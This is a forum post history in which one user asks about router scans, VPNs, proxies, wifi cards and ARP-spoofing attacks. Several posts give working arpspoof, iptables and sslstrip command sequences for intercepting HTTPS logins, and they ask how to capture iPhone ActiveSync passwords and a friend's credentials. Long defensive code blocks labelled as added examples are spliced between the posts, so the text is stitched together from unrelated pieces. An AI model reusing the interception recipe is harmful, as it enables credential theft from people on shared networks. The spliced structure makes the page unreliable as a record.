Everything posted by michael_kent123

  1. Well, yes, but they would have to know the password. When I SSH to the VPN IP, it asks me for my password. Unless the password to my system is obvious, I don't see a problem. Or am I too naive?
  2. I will check out the video over the weekend. One more thing that I kind of but not completely understand. I have SSH installed on my computer. If I ssh to my IP address provided by my ISP then the connection fails. However, if I connect to my VPN and then ssh to the VPN IP, I get a connection. I can login to my system using the password I use to login to my computer. I'm assuming that's how SSH is supposed to work (it's as if I was contacting my IP from a remote system) and the VPN has allowed its users to SSH to their home computers via the VPN IP. Does that make sense? Are there any security implications? Many thanks!
  3. Thanks for the information - I've done some more research as you suggested. I scanned my external IP from inside my LAN:

     Not shown: 997 closed ports
     PORT      STATE SERVICE
     23/tcp    open  telnet
     1900/tcp  open  upnp      # Upnp is turned off on the router so I don't know why this is open.
     40001/tcp open  unknown   # This is the way I connect to the router

     I scanned my external IP from my VPN IP:

     Note: Host seems down. If it is really up, but blocking our ping probes, try -PN
     Nmap done: 1 IP address (0 hosts up) scanned in 3.21 seconds

     I typed my external IP:40001 into the browser and, when using the VPN, it timed out. When I typed my external IP:port in (without using a VPN) it brought up the login screen. So my impression is that the router is not accessible from the internet.
  4. I have a TP-Link router and recently ran an nmap scan on it from inside my network. I'm not too worried about the results as I have turned remote admin off so the router is inaccessible from the internet. I am using the Ubuntu OS. Nonetheless, there are a few things I do not understand. Here are my results:

     23/tcp   open telnet
     1900/tcp open upnp
     2000/tcp open cisco-sccp
     2001/tcp open dc
     9000/tcp open cslistener

     Telnet makes sense; it's a way to connect to the router. Upnp I understand but, even though I've disabled it in the admin panel, it still shows "open". Maybe nmap is supposed to show it as open, even though it's closed from the perspective of the router. I don't know. Sccp (https://en.wikipedia.org/wiki/Skinny_Call_Control_Protocol) is a Cisco protocol which makes no sense to me as I don't have a Cisco router unless TP-Link has paid to use this proprietary protocol. Dc seems very mysterious and no-one seems to know what it is. Cslistener (http://brianoneill.blogspot.com/2012/02/cslistener-on-mac-osx-on-port-9000.html) may be the Checkpoint firewall which I have not installed. More generally, is there a way to run a netstat-like command on the router IP? I can telnet to it but I can't run commands like netstat to check what is happening on these ports from the router's perspective. Any ideas?
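The two kinds of scan quoted in these posts (a port list from inside the LAN, and a "Host seems down" result from outside) can be compared mechanically rather than by eye. The following is an added example, not the poster's code and not part of nmap: it parses nmap's normal-output port lines ("port/proto state service") from two constructed scan texts modelled on the ones above and reports what is reachable from where, plus what is open on the LAN beyond the services the owner meant to run. The scan text, the expected-port set and the function names are all assumptions made for the example.

```python
"""Compare an inside-the-LAN nmap scan of a router with a scan of the same
public IP from outside, and report what is exposed where.

Added example (not the poster's code or part of nmap).  The two scan texts
below are constructed to mirror the port lines quoted in the posts."""
import re
from typing import Dict, Set

# nmap "normal" output prints one line per port: "<port>/<proto> <state> <service>"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)", re.MULTILINE)

# Constructed sample scans (not real captures).
LAN_SCAN = """\
Not shown: 997 closed ports
PORT      STATE SERVICE
23/tcp    open  telnet
1900/tcp  open  upnp
40001/tcp open  unknown
"""
EXTERNAL_SCAN = """\
Note: Host seems down. If it is really up, but blocking our ping probes, try -PN
Nmap done: 1 IP address (0 hosts up) scanned in 3.21 seconds
"""
# Services the router's owner knowingly uses (assumption: only the admin UI).
EXPECTED_PORTS: Set[int] = {40001}


def parse_open_ports(scan_text: str) -> Dict[int, str]:
    """Return {port: service} for lines nmap reported as open.
    Other states (closed, open|filtered) are left out; a scan that never got
    past host discovery has no port lines at all and yields {}."""
    return {
        int(port): service
        for port, _proto, state, service in PORT_LINE.findall(scan_text)
        if state == "open"
    }


def exposure_report(lan_scan: str, external_scan: str, expected: Set[int]) -> Dict[str, object]:
    """Classify ports by where they were seen and whether they were intended."""
    lan = set(parse_open_ports(lan_scan))
    ext = set(parse_open_ports(external_scan))
    return {
        # Anything here is reachable from the internet: the finding that matters most.
        "internet_reachable": sorted(ext),
        "lan_only": sorted(lan - ext),
        # Open on the LAN but not on the owner's list: worth explaining or disabling.
        "unexpected_on_lan": sorted(lan - expected),
        # nmap never port-scanned the host, so the external result proves nothing yet.
        "external_scan_inconclusive": "Host seems down" in external_scan,
    }


if __name__ == "__main__":
    for key, value in exposure_report(LAN_SCAN, EXTERNAL_SCAN, EXPECTED_PORTS).items():
        print(f"{key:28s} {value}")
```

Two caveats a practitioner would attach to the output. "Host seems down" means nmap's host discovery got no reply and it skipped the port scan entirely; the message itself suggests -PN (spelled -Pn in current nmap) to skip discovery, and until the external scan is rerun that way it says nothing about whether the ports are filtered. And the third column in a plain scan is nmap's name for that port number from its services table, not a fingerprint of what is actually listening; only a version scan (-sV) identifies the service, which is why unfamiliar names on a home router's ports are a reason to look closer rather than a conclusion.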
  5. I finally tried tcpick but had no success. Here is what I did.

     Terminal 1:
     echo "1" > /proc/sys/net/ipv4/ip_forward
     iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
     arpspoof -i wlan0 [router IP]

     Terminal 2:
     sslstrip -l 10000 -k

     Terminal 3:
     sudo tcpick -i wlan0 -bPS -C "port 443"

     Terminal 4:
     sudo tcpick -i wlan0 -bPC -C "port 443"

     I then sent an e-mail from a different device to a Hotmail address which was set up on my iPhone with ActiveSync. Tcpick showed HTTPS connections to Microsoft but did not collect any username:password combinations (neither did sslstrip.log). The tcpick server shows content like:

     ...r......Y.t~swj......t..J...$.#. .k.g.9.3...=.<.5./...&.%.......*.)..... ...............C.........bay405-m.hotmail.com. ................. ..........3t.. ....f...ba..L!g..Q*..fA '. +........7............x..[q..Z.J...}K........ \...%S2F..q.*X..._.T}v{......|FE.. ......

     The tcpick client just showed connections to Microsoft's IP addresses. For example:

     SYN-SENT > SYN-SENT > RESET > RESET >

     I also tried using tcpick -i wlan0 -bPC -C "port 80" and tcpick -i wlan0 -bPS -C "port 80" (as i8igmac suggested). However, no data was shown. Just IP addresses. Any ideas? Thanks.
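The arpspoof step in this post has a well-defined footprint on the wire: one MAC address starts answering "is-at" for the router's IP while still owning its own address, and keeps re-announcing it. That is what a defender on the same segment watches for. The following added example, not the poster's code, runs a small detector over constructed ARP reply records (made-up addresses, not a capture): it alerts when an IP's MAC binding changes and when a single MAC has claimed the gateway IP alongside another one. Record layout, addresses and function name are constructed for the example.

```python
"""Flag ARP replies that look like cache poisoning: one MAC answering
"is-at" for the gateway's IP as well as for its own address.

Added example, not the poster's code.  The ARP records below are constructed
sample data, not a capture; all addresses are made up."""
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# One ARP reply as seen on the segment: (seconds since start, sender IP, sender MAC)
ArpReply = Tuple[float, str, str]

SAMPLE_REPLIES: List[ArpReply] = [
    (0.0, "192.168.1.1",  "aa:bb:cc:00:00:01"),  # the real router
    (1.0, "192.168.1.20", "de:ad:be:ef:00:20"),  # a client announcing its own address
    (2.0, "192.168.1.30", "12:34:56:00:00:30"),  # another client
    (5.0, "192.168.1.1",  "DE:AD:BE:EF:00:20"),  # router IP now "is-at" the .20 client's MAC
    (6.0, "192.168.1.1",  "de:ad:be:ef:00:20"),  # same claim repeated to keep caches poisoned
]


def detect_arp_spoofing(replies: List[ArpReply], gateway_ip: str) -> List[str]:
    """Return alert strings, in order of detection.

    Signal 1: an IP that was bound to one MAC is later claimed by a different MAC.
    Signal 2: a single MAC has claimed the gateway IP and at least one other IP,
              which is what a host relaying traffic in the middle looks like.
    Repeating an unchanged binding (the t=6s record above) is not an alert."""
    ip_to_mac: Dict[str, str] = {}
    mac_to_ips: Dict[str, Set[str]] = defaultdict(set)
    alerts: List[str] = []
    for ts, ip, mac in replies:
        mac = mac.lower()                      # MACs compare case-insensitively
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append(f"t={ts:.0f}s binding for {ip} changed {previous} -> {mac}")
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
    for mac, ips in mac_to_ips.items():
        others = sorted(ips - {gateway_ip})
        if gateway_ip in ips and others:
            alerts.append(f"{mac} claims gateway {gateway_ip} and also {', '.join(others)}")
    return alerts


if __name__ == "__main__":
    for line in detect_arp_spoofing(SAMPLE_REPLIES, "192.168.1.1"):
        print("ALERT:", line)
```

Signal 1 on its own has benign causes (a DHCP lease moving to another device, a replaced router, a failover pair), so in practice it is the combination with signal 2, or a binding flapping back and forth, that is worth paging on. Tools such as arpwatch keep exactly this kind of IP-to-MAC history continuously; on a switched network this is also what DHCP snooping and dynamic ARP inspection enforce at the switch.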
  6. Sourceforge is down atm but I'll look into this. How does it sniff / intercept / overcome SSL communications?
  7. Does anyone know about Microsoft ActiveSync? Link: https://en.wikipedia.org/wiki/Exchange_ActiveSync

     Basically, it is the way in which iPhone users set up their Hotmail / Outlook account. You just enter the e-mail and password and ActiveSync checks that the information is correct. You don't need to enter the POP or IMAP or SMTP details. Now, ActiveSync uses port 443 to transmit data. I thought that the username and password could be intercepted and recorded with SSL Strip. This is because the data is transmitted to the Microsoft server using HTTPS which is exactly what SSL Strip compromises when used on websites.

     Here is how I set up SSL Strip. I know for a fact that this works as I tested it by logging in to e-mail sites on the iPhone.

     echo "1" > /proc/sys/net/ipv4/ip_forward
     iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
     arpspoof -i wlan1 gateway_ip
     sslstrip -l 10000 -k

     I then sent an e-mail from a different device to the iPhone. I used Wireshark which showed that my iPhone's IP transmitted some HTTPS traffic. I assume that it logged into Microsoft servers to access the message. At this point, I am guessing that the username and password were sent to allow me to read the message. Wireshark shows a DNS request to outlook.office365.com and the iPhone's IP contacts an IP in the range - which is owned by Microsoft. This is HTTPS (over TCP) and TLSv1.2 protocols. There is also a transmission to - which is Microsoft using IMAPS. However, when I checked the SSL Strip log, nothing was recorded.

     Obviously, using ActiveSync is not the same as logging into a HTTPS website. But ActiveSync does use HTTPS so I thought that SSL Strip might work. Clearly I was wrong. Can anyone comment on this? Is there a way to acquire the password from an iPhone when the e-mail account is set up with ActiveSync? As more and more people move from computers to phones, I would have thought this would be an increasingly important attack vector.
  8. On a related note, I wonder if you know anything about Microsoft Active Sync. I set up a Hotmail account on my iPhone. To connect to the server, Microsoft apparently uses HTTPS on port 443. See, for example, http://www.altn.com/Support/FAQ/FAQResults/?Number=KBA-02281 I used arpspoof and SSLStrip in the normal way (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000). I then sent an e-mail from my Desktop to my Hotmail account on my iPhone. The phone downloaded the message. However, when I checked the SSLStrip log, nothing showed. When, on the iPhone, I log in to a webmail account (port 443) the username:password does show in my log. I'm wondering if there is a way to intercept the username:password between Hotmail on the iPhone using SSLStrip. Any ideas? Thanks!
  9. Yes. My impression is that, with the Alfa, monitor mode is promiscuous mode. It's just a question of terminology.
  10. To use SSL Strip:

      echo "1" > /proc/sys/net/ipv4/ip_forward
      iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

      Why is the destination port 80 since we want to redirect HTTPS traffic? Shouldn't it be port 443? Let's say I want to intercept secure POP which uses port 995. Can I just do:

      iptables -t nat -A PREROUTING -p tcp --destination-port 995 -j REDIRECT --to-port 10000

      Or should it be port 110 (POP) considering that HTTPS apparently uses port 80 (not 443)?
  11. Promiscuous mode - ability to see packets on the wifi network you are connected to that are not directed to your MAC. Monitor mode - ability to see packets on wifi networks to which you are not connected but that your NIC can sniff. However, since modern networks are switches rather than hubs, promiscuous mode no longer really exists. Therefore, am I correct when I say that: Monitor mode is like promiscuous mode for the network you are connected to plus you can also view nearby networks. So, if I am on SSID "Hello" and my friend is on "Hello" and he sends a non-SSL username:password to his e-mail provider, and I am in monitor mode, then I can view that password in Wireshark. Is that correct? Thanks!
  12. The other issue I wanted to ask is about increasing power via antennas. I know nothing about antenna theory. I have a 9 dBi antenna for the Alfa. What is the most powerful indoor antenna I can get for the Alfa (i.e. not having to attach it to the side of a house). Does the antenna affect only tx power or also the ability to receive better?
  13. Is there any reason therefore not to increase the tx power to 30? It seems to only do good things. More specifically, if one created a "soft" or fake AP, a higher tx power would presumably overcome the "real" signals from the genuine AP?
  14. Thanks - this is a helpful explanation. There is a thread in the Pineapple section on the best Alfa for Pineapple. I am wondering what the best Alfa is for those of us who want to use it for arpspoofing, packet injection, etc. In terms of tx power, a poster seems to be suggesting that one Alfa model can provide 2 dBi. I don't understand this if you can only alter the tx power to 30 (using iw reg set BO). Thanks again!
  15. I was recently watching a video by Vivek Ramachandran on how to increase the tx power of the Alfa card. Question: what is the benefit of this? Does it allow the Alfa to "see" networks that are further away? Does it allow for packet injection over a further distance? Does it give a benefit for arpspoofing e.g. being able to transmit the fake MAC of the router over a greater distance? Can someone please articulate the benefits of tx power 30 over, say, tx power 20.
  16. I have an AWUS 036H which I'm happy with. I'm going to buy another card. I would predominantly use it for accessing wifi, arpspoofing, and packet injection. Should I get another 036H or something else?
  17. Are there any benefits to 2 watts which is, I believe, 33 dBm. After all, the maximum txpower can be set to is 30dBm (iw reg set BO).
  18. I have an Alfa AWUS036H which is, I guess, at least five years old. I want to buy an additional Alfa but have noticed there are multiple versions. A search on this forum reveals: AWUS036NEH AWUS036NHR AWUS036H AWUS036NHA AWUS036A There are numerous other versions here. I also purchased a 9dBi antenna so whatever I get needs to be able to add an antenna. If you were buying an Alfa for airmon-ng mode, packet injection, etc, what version would you get?
  19. Thank you for the answer. I have a couple of questions. I've read about HSTS (https://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security). The article claims that HSTS defeats SSL Strip. I don't understand this because, using the latest version of both IE and FF, I just successfully stripped my HTTPS connections to websites like Facebook and Gmail. What I still don't understand is how the app validates the user. Is the user's username and password being sent to a server as in the traditional client / server model?
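The HSTS mechanism this post asks about is easier to reason about once the client-side logic is written down. The following is an added example, not the poster's code and not any browser's implementation: a minimal Strict-Transport-Security parser (RFC 6797 syntax), a policy store, and the decision a client makes before sending a plain http:// request. It is exercised with constructed header values and hostnames. Two properties matter for the question above and are visible in the code: the header only takes effect after it has been received once over a valid HTTPS connection (a first visit to a host the client has never seen is not covered, which is what browser preload lists exist to close), and it is ignored on http:// responses, so nothing sent over plain HTTP can switch the protection off.

```python
"""How an HSTS-aware client decides whether a plain http:// request may be
sent at all.  Added example (not the poster's code and not any browser's
implementation): a small Strict-Transport-Security parser (RFC 6797 syntax)
plus the policy store and upgrade decision, exercised with constructed
headers and hostnames."""
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class HstsPolicy:
    expires_at: float          # absolute time (seconds) after which the entry lapses
    include_subdomains: bool


def parse_hsts(header: str, now: float) -> Optional[HstsPolicy]:
    """Parse a Strict-Transport-Security header value.

    Returns None when max-age is missing or not a number (the header is then
    ignored).  max-age=0 is valid and yields an already-expired policy, which
    the store treats as 'forget this host'."""
    max_age: Optional[int] = None
    include_subdomains = False
    for directive in header.split(";"):
        name, _, value = directive.strip().partition("=")
        name, value = name.strip().lower(), value.strip().strip('"')
        if name == "max-age":
            if not value.isdigit():
                return None
            max_age = int(value)
        elif name == "includesubdomains":
            include_subdomains = True
    if max_age is None:
        return None
    return HstsPolicy(expires_at=now + max_age, include_subdomains=include_subdomains)


class HstsStore:
    """The client's remembered hosts, keyed by lowercase hostname."""

    def __init__(self) -> None:
        self.hosts: Dict[str, HstsPolicy] = {}

    def note_response(self, host: str, scheme: str, header: Optional[str], now: float) -> None:
        """Record the header from a response.  Only responses that arrived over
        HTTPS count (RFC 6797 also requires no certificate errors); a header on
        an http:// response can neither set nor clear a policy."""
        if scheme != "https" or header is None:
            return
        policy = parse_hsts(header, now)
        if policy is None:
            return
        if policy.expires_at <= now:            # max-age=0: the site opted out
            self.hosts.pop(host.lower(), None)
        else:
            self.hosts[host.lower()] = policy

    def must_use_https(self, host: str, now: float) -> bool:
        """True if an http:// URL for this host has to be rewritten to https://
        before any connection is made.  Checks the host itself, then each
        parent domain whose policy carries includeSubDomains."""
        labels = host.lower().split(".")
        for i in range(len(labels)):
            policy = self.hosts.get(".".join(labels[i:]))
            if policy is None or policy.expires_at <= now:
                continue                         # unknown or lapsed entry
            if i == 0 or policy.include_subdomains:
                return True
        return False
```

The upgrade happens inside the client before a socket is opened, which is the whole point: a downgrade proxy on the path only ever sees HTTPS for a remembered host. The gaps are the ones the code makes explicit: a host the client has never visited over HTTPS, a policy that has expired, and a subdomain when the parent's header lacks includeSubDomains.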
  20. I have wondered for some time how apps (e.g. Facebook, Twitter, or Instagram) on an iPhone or Android device transmit the username and password. For example, if I am using a laptop and want to login to Facebook then I browse to https://www.facebook.com and enter my username and password which is transmitted to Facebook which checks whether it is accurate or not. However, if I use the Facebook app, how is the username and password invoked? If you are a MITM and you intercept client-server communications (e.g. with SSL Strip) then you can get my Facebook username and password. However, if I am using an app (over wireless) to login to Facebook then can you as the MITM grab my login details? In all cases, we are using a wireless network.
  21. Thanks. So, in other words, HTTP can only do HTTP/S but SOCKS can do SSH (for example) and also HTTP/S. Yes?
  22. Hello, I have wondered for some time about the difference between proxy types. For example, Tor uses SOCKS 5. On the other hand, I can find lists of proxies and enter the IP:port into the HTTP proxy section of Firefox. What is the difference in practical usage between a HTTP proxy and a SOCKS 5 proxy? How are these proxies used? Are they used for different purposes? What are their advantages and disadvantages? Thank you.
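The practical difference between the two proxy types in these two posts comes down to what the application actually sends to the proxy. To an HTTP proxy the client speaks HTTP: for an https:// URL a browser such as Firefox sends a CONNECT request and the proxy opens a raw TCP tunnel, so CONNECT can in principle carry any TCP protocol, though browsers only use it for HTTPS. SOCKS5 (RFC 1928) is a small binary protocol designed to be application-agnostic: the destination host and port travel in the request itself, the proxy can do the DNS resolution (which is why Tor's SOCKS port avoids DNS leaks when the application hands it a hostname rather than an address), and the same handshake works for SSH, IMAP or anything else over TCP. The following added example, not the poster's code or any real proxy, builds both kinds of request and decodes them on the proxy side so the two message shapes can be seen side by side; the hostnames and ports are constructed.

```python
"""What an application sends to an HTTP proxy versus a SOCKS5 proxy to reach
the same destination.  Added example, not the poster's code; the proxy-side
functions are minimal decoders written here to show the message shapes
(RFC 1928 for SOCKS5, the CONNECT method for HTTP), not a working proxy."""
import socket
import struct
from typing import Tuple

# --- HTTP proxy: the client speaks HTTP to the proxy itself ------------------
def http_connect_request(host: str, port: int) -> bytes:
    """CONNECT asks the proxy for a raw TCP tunnel to host:port (how a browser
    sends HTTPS through an HTTP proxy).  For a plain http:// URL the client
    would instead send a full GET with an absolute URI for the proxy to forward."""
    return f"CONNECT {host}:{port} HTTP/1.1\r\nHost: {host}:{port}\r\n\r\n".encode()

def http_proxy_parse(request: bytes) -> Tuple[str, int]:
    """Proxy side: recover the tunnel destination from the request line."""
    request_line = request.split(b"\r\n", 1)[0].decode()
    method, target, _version = request_line.split(" ")
    if method != "CONNECT":
        raise ValueError("only CONNECT is decoded in this example")
    host, _, port = target.rpartition(":")
    return host, int(port)

# --- SOCKS5: a binary protocol that carries any TCP destination ---------------
SOCKS_VER, NO_AUTH, CMD_CONNECT, ATYP_IPV4, ATYP_DOMAIN = 5, 0, 1, 1, 3

def socks5_greeting() -> bytes:
    """VER NMETHODS METHODS...: the client offers authentication methods;
    only 'no authentication' (0x00) is offered here."""
    return bytes([SOCKS_VER, 1, NO_AUTH])

def socks5_connect_request(host: str, port: int) -> bytes:
    """VER CMD RSV ATYP DST.ADDR DST.PORT.  A dotted-quad host is sent as ATYP 1;
    anything else is sent as a domain name (ATYP 3) so the proxy resolves it
    and no DNS query leaves the client."""
    try:
        addr = bytes([ATYP_IPV4]) + socket.inet_aton(host)
    except OSError:                                  # not an IPv4 literal
        raw = host.encode("idna")
        addr = bytes([ATYP_DOMAIN, len(raw)]) + raw
    return bytes([SOCKS_VER, CMD_CONNECT, 0]) + addr + struct.pack("!H", port)

def socks5_proxy_parse(request: bytes) -> Tuple[str, int]:
    """Proxy side: decode the destination from a CONNECT request."""
    ver, cmd, _rsv, atyp = request[:4]
    if ver != SOCKS_VER or cmd != CMD_CONNECT:
        raise ValueError("unsupported SOCKS request")
    if atyp == ATYP_IPV4:
        host, rest = socket.inet_ntoa(request[4:8]), request[8:]
    elif atyp == ATYP_DOMAIN:
        length = request[4]
        host, rest = request[5:5 + length].decode("idna"), request[5 + length:]
    else:
        raise ValueError("IPv6 (ATYP 4) omitted in this example")
    (port,) = struct.unpack("!H", rest[:2])
    return host, port

def socks5_reply(success: bool, bind_ip: str = "0.0.0.0", bind_port: int = 0) -> bytes:
    """VER REP RSV ATYP BND.ADDR BND.PORT; REP 0 = succeeded, 1 = general failure.
    After a successful reply the connection is a transparent byte pipe."""
    return (bytes([SOCKS_VER, 0 if success else 1, 0, ATYP_IPV4])
            + socket.inet_aton(bind_ip) + struct.pack("!H", bind_port))

if __name__ == "__main__":
    # Constructed destinations; both proxies end up tunnelling the same TCP stream.
    print(http_connect_request("mail.example.test", 993))
    print(socks5_greeting().hex(), socks5_connect_request("mail.example.test", 22).hex())
    print(socks5_proxy_parse(socks5_connect_request("mail.example.test", 22)))
```

Once either handshake completes, the proxy is a byte pipe and neither one can see inside a TLS session; the difference is in what the proxy learns up front (the destination host and port in both cases, plus the DNS lookup when SOCKS5 is given a name) and in which applications know how to speak to it. That is also the defender's view: a proxy is a choke point for logging and policy on destinations, not a way to inspect encrypted content.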
  23. I have a question about the use of VPN services. If you go to www.whatismyip.com or equivalent then you see the VPN IP not the ISP IP. Normally, I have an internal 192.168.x.x IP and my ISP IP. With a VPN, I have the internal IP and the VPN IP. So, when using a VPN, does that mean that there is no ISP IP but only an internal IP and a VPN IP? In other words, does the VPN effectively replace the ISP IP with its IP? Is it: a) 192.168.x.x --> VPN IP. or b) 192.168.x.x --> ISP IP --> VPN IP. Thank you!
  24. I take your point. I was so used to having shared IPs that I forgot that the VPS means that only I use a specific IP!
  25. Here is something I do not understand even though I'm sure there is a simple answer. I SSH to my VPS. This VPS has not had DNS propagation started. I can only access it via an IP address. I upload some files to /var/www/. I then go in the web browser to the VPS IP. I can see the files e.g. index.html. Here is what I do not understand. How does the web browser know the correct content to serve me? Presumably, I am not the only person using that IP address. If I were to have linked the domain name to the IP via DNS propagation, then my domain panel would point to the nameservers of the VPS and I would have entered my domain name in the VPS control panel. Hence, when I request www.domain.com, I am given the correct files as the domain name and IP are linked. But in this case, I just type How does the VPS know what to give me? The files are stored on their servers. I do not host anything in my /var/www/ directory.